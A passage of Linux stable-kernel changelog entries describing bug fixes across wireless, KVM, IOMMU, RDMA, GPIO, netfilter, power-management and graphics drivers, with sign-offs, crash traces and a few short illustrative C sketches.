Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9853a55ef1 upstream.
It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.
Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.
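Sketched (identifier names assumed), insertion of a new BSS entry gives up once
the cap is reached and nothing can be expired:
  /* cap the table; try to expire the oldest unreferenced entry first */
  if (rdev->bss_entries >= bss_entries_limit &&
      !cfg80211_bss_expire_oldest(rdev))
          return NULL;            /* refuse to cache this new entry */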
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e658a6f14d upstream.
For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits. For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.
Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
important than accepting a wider range of cycle values. So,
just use mult_frac() directly in tile's sched_clock().
Commit 4cecf6d401 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile. In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.
Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it. This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time. However, the compiler pipelines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash. If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.
Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.
For now, just using mult_frac() seems like the right answer.
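For concreteness (mult = 853 from the changelog, shift = 10 assumed): at
1.2 GHz, cycles * 853 exceeds 2^64 after about 2^64 / 853 / 1.2e9 seconds,
i.e. roughly 208 days, while mult_frac() never forms that product:
  /* ns = (cycles / 2^shift) * mult + ((cycles % 2^shift) * mult) / 2^shift,
   * which equals (cycles * mult) >> shift without the 64-bit overflow */
  static inline unsigned long long cycles_to_ns(u64 cycles)
  {
          return mult_frac(cycles, 853ULL, 1ULL << 10);
  }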
Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18f6084a98 upstream.
This is a workaround for a bug with LSI Fusion MPT SAS2 when performing
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called for the specific
command which timed out, this leads to entire device halt
(scsi_state terminated) and premature termination of the secure erase.
Set device state to busy while ATA passthrough commands are in progress.
[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]
Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ce9d2272b upstream.
Some code (all error handling) submits CDBs that are allocated
on the stack. This breaks with CB/CBI code that tries to create
a URB directly from the SCSI command buffer - which happens to be in
vmalloced memory with vmalloced kernel stacks.
Let's make a copy of the command in usb_stor_CB_transport.
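A hedged sketch of the copy, reusing the driver's existing heap scratch buffer
(us->iobuf):
  /* srb->cmnd may live on a vmalloc'ed stack; stage it in DMA-able memory */
  memcpy(us->iobuf, srb->cmnd, srb->cmd_len);
  result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe,
                                  US_CBI_ADSC, USB_TYPE_CLASS |
                                  USB_RECIP_INTERFACE, 0, us->ifnum,
                                  us->iobuf, srb->cmd_len);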
Signed-off-by: Petr Vandrovec <petr@vandrovec.name>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9bfef729a3 upstream.
This patch adds support for the TI CC3200 LaunchPad board, which uses a
custom USB vendor ID and product ID. Channel A is used for JTAG, and
channel B is used for a UART.
Signed-off-by: Doug Brown <doug@schmorgal.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ab13292d7 upstream.
The BRIM Brothers Zone DPMX is a bicycle powermeter. This ID is for the USB
serial interface in its charging dock for the control pods, via which some
settings for the pods can be modified.
Signed-off-by: Paul Jakma <paul@jakma.org>
Cc: Barry Redmond <barry@brimbrothers.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2117d5398c upstream.
em_jmp_far and em_ret_far assumed that setting IP can only fail in 64
bit mode, but syzkaller proved otherwise (and SDM agrees).
Code segment was restored upon failure, but it was left uninitialized
outside of long mode, which could lead to a leak of host kernel stack.
We could have fixed that by always saving and restoring the CS, but we
take a simpler approach and just break any guest that manages to fail
as the error recovery is error-prone and modern CPUs don't need emulator
for this.
Found by syzkaller:
WARNING: CPU: 2 PID: 3668 at arch/x86/kvm/emulate.c:2217 em_ret_far+0x428/0x480
Kernel panic - not syncing: panic_on_warn set ...
CPU: 2 PID: 3668 Comm: syz-executor Not tainted 4.9.0-rc4+ #49
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
[...]
Call Trace:
[...] __dump_stack lib/dump_stack.c:15
[...] dump_stack+0xb3/0x118 lib/dump_stack.c:51
[...] panic+0x1b7/0x3a3 kernel/panic.c:179
[...] __warn+0x1c4/0x1e0 kernel/panic.c:542
[...] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[...] em_ret_far+0x428/0x480 arch/x86/kvm/emulate.c:2217
[...] em_ret_far_imm+0x17/0x70 arch/x86/kvm/emulate.c:2227
[...] x86_emulate_insn+0x87a/0x3730 arch/x86/kvm/emulate.c:5294
[...] x86_emulate_instruction+0x520/0x1ba0 arch/x86/kvm/x86.c:5545
[...] emulate_instruction arch/x86/include/asm/kvm_host.h:1116
[...] complete_emulated_io arch/x86/kvm/x86.c:6870
[...] complete_emulated_mmio+0x4e9/0x710 arch/x86/kvm/x86.c:6934
[...] kvm_arch_vcpu_ioctl_run+0x3b7a/0x5a90 arch/x86/kvm/x86.c:6978
[...] kvm_vcpu_ioctl+0x61e/0xdd0 arch/x86/kvm/../../../virt/kvm/kvm_main.c:2557
[...] vfs_ioctl fs/ioctl.c:43
[...] do_vfs_ioctl+0x18c/0x1040 fs/ioctl.c:679
[...] SYSC_ioctl fs/ioctl.c:694
[...] SyS_ioctl+0x8f/0xc0 fs/ioctl.c:685
[...] entry_SYSCALL_64_fastpath+0x1f/0xc2
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes: d1442d85cc ("KVM: x86: Handle errors when RIP is set during far jumps")
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c387188c6 upstream.
The VT-d specification (§8.3.3) says:
‘Virtual Functions’ of a ‘Physical Function’ are under the scope
of the same remapping unit as the ‘Physical Function’.
The BIOS is not required to list all the possible VFs in the scope
tables, and arguably *shouldn't* make any attempt to do so, since there
could be a huge number of them.
This has been broken basically forever - the VF is never going to match
against a specific unit's scope, so it ends up being assigned to the
INCLUDE_ALL IOMMU. Which was always actually correct by coincidence, but
now that we're looking at Root-Complex integrated devices with SR-IOV
support it's going to start being wrong.
Fix it to simply use pci_physfn() before doing the lookup for PCI devices.
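A minimal sketch of the lookup change (pci_physfn() returns the PF for a VF
and the device itself otherwise):
  struct pci_dev *pdev = to_pci_dev(dev);

  /* Per VT-d §8.3.3 a VF is covered by its PF's remapping unit, so match
   * the DMAR scope against the physical function. */
  if (pdev->is_virtfn)
          pdev = pci_physfn(pdev);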
Signed-off-by: Sainath Grandhi <sainath.grandhi@intel.com>
Signed-off-by: Ashok Raj <ashok.raj@intel.com>
Signed-off-by: David Woodhouse <dwmw2@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9101704429 upstream.
Somehow I ended up with an off-by-three error in calculating the size of
the PASID and PASID State tables, which triggers allocation failures as
those tables unfortunately have to be physically contiguous.
In fact, even the *correct* maximum size of 8MiB is problematic and is
wont to lead to allocation failures. Since I have extracted a promise
that this *will* be fixed in hardware, I'm happy to limit it on the
current hardware to a maximum of 0x20000 PASIDs, which gives us 1MiB
tables — still not ideal, but better than before.
Reported by Mika Kuoppala <mika.kuoppala@linux.intel.com> and also by
Xunlei Pang <xlpang@redhat.com> who submitted a simpler patch to fix
only the allocation (and not the free) to the "correct" limit... which
was still problematic.
Signed-off-by: David Woodhouse <dwmw2@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53f8d32223 upstream.
gpiod_set_array_value_complex() does not clear the bits field.
Therefore, when the driver's set_multiple function is called, bits outside
the mask are undefined and can be either set or not. So bank_val needs
to be masked with bank_mask before being ORed with the reg_val cache.
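The masking amounts to this (a self-contained helper with an assumed name;
the real code updates the driver's reg_output cache in place):
  /* Merge only the requested bank bits into the cached register value. */
  static u8 pca953x_merge_bank(u8 reg_val, u8 bank_mask, u8 bank_val)
  {
          return (reg_val & ~bank_mask) | (bank_val & bank_mask);
  }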
Fixes: b4818afeac ("gpio: pca953x: Add set_multiple to allow multiple")
Signed-off-by: Phil Reid <preid@electromag.com.au>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 386377b547 upstream.
Need to ensure that reg_output is not updated while setting multiple
bits. This makes the mutex locking behaviour for the set_multiple call
consistent with that of the set_value call.
Fixes: b4818afeac ("gpio: pca953x: Add set_multiple to allow multiple")
Signed-off-by: Phil Reid <preid@electromag.com.au>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a8b1e36d0d upstream.
With HZ=100, the element timeout in dynamic sets (i.e. flow tables) is 10
times higher than configured.
Add proper conversion to/from jiffies when interacting with userspace.
I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.
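The conversion is the usual msecs/jiffies round-trip at the netlink
boundary; a sketch (the helper names are illustrative):
  #include <linux/jiffies.h>

  /* Userspace -> kernel: the netlink attribute carries milliseconds. */
  static u64 set_elem_timeout_from_user(u64 ms)
  {
          return msecs_to_jiffies(ms);
  }

  /* Kernel -> userspace: report milliseconds, not raw jiffies. */
  static u64 set_elem_timeout_to_user(unsigned long timeout_jiffies)
  {
          return jiffies_to_msecs(timeout_jiffies);
  }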
Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9db0ff53cb upstream.
When there is a CM id object that has a port assigned to it, it means that
the cm-id asked for a specific port that it should go by, but if that
port was removed (hot-unplug event) the cm-id was not updated.
In order to fix that, the port keeps a list of all the cm-ids that are
planning to go by it; whenever the port is removed, it marks all of them
as invalid.
This commit fixes a kernel panic which happens when running traffic between
guests and force-rebooting a guest mid-traffic, which triggers a kernel panic:
Call Trace:
[<ffffffff815271fa>] ? panic+0xa7/0x16f
[<ffffffff8152b534>] ? oops_end+0xe4/0x100
[<ffffffff8104a00b>] ? no_context+0xfb/0x260
[<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
[<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
[<ffffffff81084240>] ? process_timeout+0x0/0x10
[<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
[<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
[<ffffffff81065df0>] ? default_wake_function+0x0/0x20
[<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
[<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
[<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
[<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
[<ffffffff8152a815>] ? page_fault+0x25/0x30
[<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
[<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
[<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
[<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
[<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
[<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
[<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
[<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
[<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
[<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
[<ffffffff8109aef6>] ? kthread+0x96/0xa0
[<ffffffff8100c20a>] ? child_rip+0xa/0x20
[<ffffffff8109ae60>] ? kthread+0x0/0xa0
[<ffffffff8100c200>] ? child_rip+0x0/0x20
Fixes: a977049dac ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Reviewed-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5b810a242c upstream.
The real QP is destroyed when the ref count reaches zero, but
for XRC target QPs this call was missed, which caused QP leaks.
Let's call destroy for all flows.
Fixes: 0e0ec7e063 ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: Noa Osherovich <noaos@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3c7ba5760a upstream.
sg_alloc_table() takes an unsigned int as a parameter while the driver
computes the value as a size_t. Check that npages isn't greater than the
maximum unsigned int.
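The added bound check is essentially (the helper name is illustrative):
  #include <linux/kernel.h>

  /* sg_alloc_table() takes an unsigned int count, but npages is a size_t. */
  static int ib_umem_check_npages(size_t npages)
  {
          if (npages == 0 || npages > UINT_MAX)
                  return -EINVAL;
          return 0;
  }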
Fixes: eeb8461e36 ("IB: Refactor umem to use linear SG table")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbaaff2a2c upstream.
When an internal error condition is detected, make sure to set the
device inactive after dispatching the event so ULPs can get a
notification of this event.
Fixes: e126ba97db ('mlx5: Add driver for Mellanox Connect-IB adapters')
Signed-off-by: Eli Cohen <eli@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Reviewed-by: Mohamad Haj Yahia <mohamad@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 16b0e0695a upstream.
When creating kernel CQs use 128B CQE stride if the
cache line size is 128B, 64B otherwise. This prevents
multiple CQEs from residing in a 128B cache line,
which can cause retries when there are concurrent
reads and writes in one cache line.
Tested with IPoIB on PPC64, saw ~5% throughput
improvement.
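The selection reduces to something like this (cache_line_size() is the
generic kernel helper; the function name here is an assumption):
  #include <linux/cache.h>

  /* Use 128B CQEs when the cache line is 128B, so two CQEs never share
   * a cache line. */
  static int mlx5_pick_kernel_cqe_size(void)
  {
          return (cache_line_size() == 128) ? 128 : 64;
  }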
Fixes: e126ba97db ('mlx5: Add driver for Mellanox Connect-IB adapters')
Signed-off-by: Daniel Jurgens <danielj@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aa75b07b47 upstream.
RXE resets the send-q only once in rxe_qp_init_req() when the
QP is created, but when the QP is reused after a QP reset, the send-q
holds previous garbage data.
This garbage data wrongly fails CQEs that otherwise
should have completed successfully.
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 002e062e13 upstream.
To correctly handle an erroneous WR, this fix does the following:
1. Make sure the bad WQE causes a user completion event.
2. Call rxe_completer to handle the erred WQE.
Before the fix, when rxe_requester found a bad WQE, it changed its
status to IB_WC_LOC_PROT_ERR and exited with 0 for non-RC QPs.
If this was the 1st WQE then there would be no ACK to invoke the
completer and this bad WQE would be stuck in the QP's send-q.
On top of that, the requester exiting with 0 caused rxe_do_task to
endlessly invoke rxe_requester, resulting in the soft-lockup attached
below.
In case the WQE was not the 1st and rxe_completer did get a chance to
handle the bad WQE, it did not cause a completion event since the WQE's
IB_SEND_SIGNALED flag was not set.
Setting the WQE status to IB_SEND_SIGNALED is subject to IBA spec
version 1.2.1, section 10.7.3.1 Signaled Completions.
NMI watchdog: BUG: soft lockup - CPU#7 stuck for 22s!
[<ffffffffa0590145>] ? rxe_pool_get_index+0x35/0xb0 [rdma_rxe]
[<ffffffffa05952ec>] lookup_mem+0x3c/0xc0 [rdma_rxe]
[<ffffffffa0595534>] copy_data+0x1c4/0x230 [rdma_rxe]
[<ffffffffa058c180>] rxe_requester+0x9d0/0x1100 [rdma_rxe]
[<ffffffff8158e98a>] ? kfree_skbmem+0x5a/0x60
[<ffffffffa05962c9>] rxe_do_task+0x89/0xf0 [rdma_rxe]
[<ffffffffa05963e2>] rxe_run_task+0x12/0x30 [rdma_rxe]
[<ffffffffa059110a>] rxe_post_send+0x41a/0x550 [rdma_rxe]
[<ffffffff811ef922>] ? __kmalloc+0x182/0x200
[<ffffffff816ba512>] ? down_read+0x12/0x40
[<ffffffffa054bd32>] ib_uverbs_post_send+0x532/0x540 [ib_uverbs]
[<ffffffff815f8722>] ? tcp_sendmsg+0x402/0xb80
[<ffffffffa05453dc>] ib_uverbs_write+0x18c/0x3f0 [ib_uverbs]
[<ffffffff81623c2e>] ? inet_recvmsg+0x7e/0xb0
[<ffffffff8158764d>] ? sock_recvmsg+0x3d/0x50
[<ffffffff81215b87>] __vfs_write+0x37/0x140
[<ffffffff81216892>] vfs_write+0xb2/0x1b0
[<ffffffff81217ce5>] SyS_write+0x55/0xc0
[<ffffffff816bc672>] entry_SYSCALL_64_fastpath+0x1a/0xa
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d931308f5 upstream.
The method rxe_qp_error() transitions the QP to the error state
and makes sure the QP is drained. It did not, though, update
the QP state for the user's query.
This patch fixes this.
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c72ab446ca upstream.
Markus reported that there's a weird behavior on perf top --hierarchy
regarding the column length.
Looking at the code, I found dubious code which affects the symptoms.
When the --hierarchy option is used, the last column length might be
inaccurate since it skips updating the length on leaf entries.
I cannot remember why it did that; it looks like a leftover from a previous
version during the development.
Anyway, updating the column length often is not harmful. So let's move
the code out.
Reported-and-Tested-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 1a3906a7e6 ("perf hists: Resort hist entries with hierarchy")
Link: http://lkml.kernel.org/r/20161108130833.9263-5-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6f75c3fd56 upstream.
Consider two devices, A and B, where B is a child of A, and B utilizes
asynchronous suspend (it does not matter whether A is sync or async). If
B fails to suspend_noirq() or suspend_late(), or is interrupted by a
wakeup (pm_wakeup_pending()), then it aborts and sets the async_error
variable. However, device A does not (immediately) check the async_error
variable; it may continue to run its own suspend_noirq()/suspend_late()
callback. This is bad.
We can resolve this problem by doing our error and wakeup checking
(particularly, for the async_error flag) after waiting for children to
suspend, instead of before. This also helps align the logic for the noirq and
late suspend cases with the logic in __device_suspend().
It's easy to observe this erroneous behavior by, for example, forcing a
device to sleep a bit in its suspend_noirq() (to ensure the parent is
waiting for the child to complete), then return an error, and watch the
parent suspend_noirq() still get called. (Or similarly, fake a wakeup
event at the right (or is it wrong?) time.)
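Roughly, the reordered sequence in the noirq/late suspend paths looks like
this (dpm_wait_for_children(), async_error and pm_wakeup_pending() are the
existing pieces in drivers/base/power/main.c; the exact placement is an
assumption):
  dpm_wait_for_children(dev, async);

  /* Only after the children are done do we decide whether to bail out,
   * so a child's failure or a pending wakeup stops the parent too. */
  if (async_error)
          goto Complete;

  if (pm_wakeup_pending()) {
          async_error = -EBUSY;
          goto Complete;
  }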
Fixes: de377b3972 (PM / sleep: Asynchronous threads for suspend_late)
Fixes: 28b6fd6e37 (PM / sleep: Asynchronous threads for suspend_noirq)
Reported-by: Jeffy Chen <jeffy.chen@rock-chips.com>
Signed-off-by: Brian Norris <briannorris@chromium.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d6124b409c upstream.
This subsystem consistently fails to drop the device reference taken by
class_find_device().
Note that some of these lookup functions already take a reference to the
returned data, while others claim no reference is needed (or do not
seem to need one).
Fixes: 183b9b592a ("uwb: add the UWB stack (core files)")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 722f191080 upstream.
Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().
Fixes: a9bbba9963 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a732c65de upstream.
When we sync the RX queues the driver waits to receive echo
notification on all the RX queues.
The wait queue is set with timeout until all queues have received
the notification.
However, iwl_mvm_rx_queue_notif() never woke up the wait queue, so the
counter value was checked only when the timeout expired.
This may cause a latency of up to 1 second.
Fixes: 0636b93821 ("iwlwifi: mvm: implement driver RX queues sync command")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 85cd69b8f1 upstream.
When a unified D0/D3 image is used, we don't restart the FW in the
D0->D3->D0 transitions. Therefore, the d3_test functionality should
not call ieee80211_restart_hw() when resuming either.
Fixes: commit 23ae61282b ("iwlwifi: mvm: Do not switch to D3 image on suspend")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5a143db8c4 upstream.
With unified images, we need to make sure the net-detect scan is
stopped after resuming, since we don't restart the FW. Also, we need
to make sure we check if there are enough scan slots available to run
it, as we do with other scans.
Fixes: commit 23ae61282b ("iwlwifi: mvm: Do not switch to D3 image on suspend")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit faead41cc7 upstream.
Emmanuel reports that when CMD_WANT_ASYNC_CALLBACK is used by mvm,
the callback will be called with the command queue lock held, and
mvm will try to stop all (other) TX queues, which acquires their
locks - this caused a false lockdep recursive locking report.
Suppress this report by marking the command queue lock with a new,
separate, lock class so lockdep can tell the difference between
the two types of queues.
Fixes: 156f92f2b4 ("iwlwifi: block the queues when we send ADD_STA for uAPSD")
Reported-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0d9727c11 upstream.
The SPLC data parsing is too restrictive and was not trying to find the
correct element for WiFi. This causes problems with some BIOSes where
the SPLC method exists, but doesn't have a WiFi entry on the first
element of the list. The domain type values are also incorrect
according to the specification.
Fix this by complying with the actual specification.
Additionally, replace all occurrences of SPLX with SPLC, since SPLX is
only a structure internal to the ACPI tables, and may not even exist.
Fixes: bcb079a14d ("iwlwifi: pcie: retrieve and parse ACPI power limitations")
Reported-by: Chris Rorvick <chris@rorvick.com>
Tested-by: Paul Bolle <pebolle@tiscali.nl>
Tested-by: Chris Rorvick <chris@rorvick.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5c2f117a22 upstream.
Since 'parent_rate * mfn' may overflow 32 bits, the result should be
stored using 64 bits.
The problem was discovered when trying to set the rate of the audio PLL
(pll4_post_div) on an i.MX6Q. The desired rate was 196.608 MHz, but
the actual rate returned was 192.000570 MHz. The round rate function should
have been able to return 196.608 MHz, i.e., the desired rate.
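A sketch of the overflow-safe math (do_div() is the kernel's 64-by-32
division helper; the formula mirrors the AV PLL rate calculation but the
helper below is illustrative):
  #include <linux/types.h>
  #include <asm/div64.h>

  /* rate = parent_rate * div + parent_rate * mfn / mfd, computed without
   * the 32-bit overflow in parent_rate * mfn. */
  static unsigned long av_pll_round(unsigned long parent_rate, u32 div,
                                    u32 mfn, u32 mfd)
  {
          u64 temp64 = (u64)parent_rate * mfn;

          do_div(temp64, mfd);
          return parent_rate * div + (unsigned long)temp64;
  }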
Fixes: ba7f4f557e ("clk: imx: correct AV PLL rate formula")
Cc: Anson Huang <b20788@freescale.com>
Signed-off-by: Emil Lundmark <emil@limesaudio.com>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f3358507c1 upstream.
Virtio 1.0 spec says VIRTIO_F_ANY_LAYOUT and VIRTIO_NET_F_GSO are
legacy-only feature bits. Do not negotiate them in virtio 1 mode. Note
this is a spec violation so we need to backport it to stable/downstream
kernels.
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Reviewed-by: Cornelia Huck <cornelia.huck@de.ibm.com>
Acked-by: Jason Wang <jasowang@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bc9db5ad32 upstream.
My heuristic for detecting type 1 DVI DP++ adaptors based on the VBT
port information apparently didn't survive the reality of buggy VBTs.
In this particular case we have a machine with a native HDMI port, but
the VBT tells us it's a DP++ port based on its capabilities.
The dvo_port information in VBT does claim that we're dealing with a
HDMI port though, but we have other machines which do the same even
when they actually have DP++ ports. So that piece of information alone
isn't sufficient to tell the two apart.
After staring at a bunch of VBTs from various machines, I have to
conclude that the only other semi-reliable clue we can use is the
presence of the AUX channel in the VBT. On this particular machine
AUX channel is specified as zero, whereas on some of the other machines
which listed the DP++ port as HDMI have a non-zero AUX channel.
I've also seen VBTs which have dvo_port as DP but a zero AUX
channel. I believe we need to treat those as DP ports, so we'll limit
the AUX channel check to just the cases where dvo_port is HDMI.
If we encounter any more serious failures with this heuristic I think
we'll have to throw it out entirely. But that could mean that
there is a risk of type 1 DVI dongle users getting greeted by a
black screen, so I'd rather not go there unless absolutely necessary.
v2: Remove the duplicate PORT_A check (Daniel)
